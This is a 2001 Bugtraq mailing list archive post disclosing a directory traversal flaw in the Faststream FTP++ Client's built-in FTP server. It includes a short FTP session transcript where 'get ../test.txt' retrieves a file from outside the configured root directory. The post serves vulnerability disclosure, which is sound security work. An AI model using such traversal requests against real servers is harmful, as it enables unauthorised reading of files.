|
Bugtraq
mailing list archives
Faststream FTP++ Client 2 Beta 11 (build in server) Vulnerability
From: se00020 () LION CC
Date: Sun, 4 Mar 2001 16:26:23 -0000
Faststram FTP built in server responds with the real
path of directory
instead of a virtual one.It is possible to get files
outside of root.dir.
e:\crap was used as root directory
1. directory path
230 User anonymous logged in.
ftp> pwd
257 "/E:/crap/" is current directory.
2. getting files from outside of root
ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 .
drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 ..
drw-rw-rw- 1 ftp ftp 0 Mar 02 12:17 test
-rw-rw-rw- 1 ftp ftp 6 Mar 02 12:33
movedtohomedir.txt
-rw-rw-rw- 1 ftp ftp 11 Mar 02 00:29
bisontest.txt
drw-rw-rw- 1 ftp ftp 0 Mar 03 15:59 HTTP
drw-rw-rw- 1 ftp ftp 0 Mar 03 17:05 huhu
226 File sent ok
FTP: 438 Bytes empfangen in 0,00Sekunden
438000,00KB/s
ftp> get ../test.txt
200 Port command successful.
150 Opening data connection for ../test.txt.
226 File sent ok
FTP: 15 Bytes empfangen in 0,01Sekunden 1,50KB/s
Solution:
no quick fix possible.Use with care.
Author has been contacted on 04.Mar.2001
se00020 () fhs-hagenberg ac at
se00020 () lion cc
 By Date 
By Thread
Current thread:
- Faststream FTP++ Client 2 Beta 11 (build in server) Vulnerability se00020 (Mar 04)
|
Intro
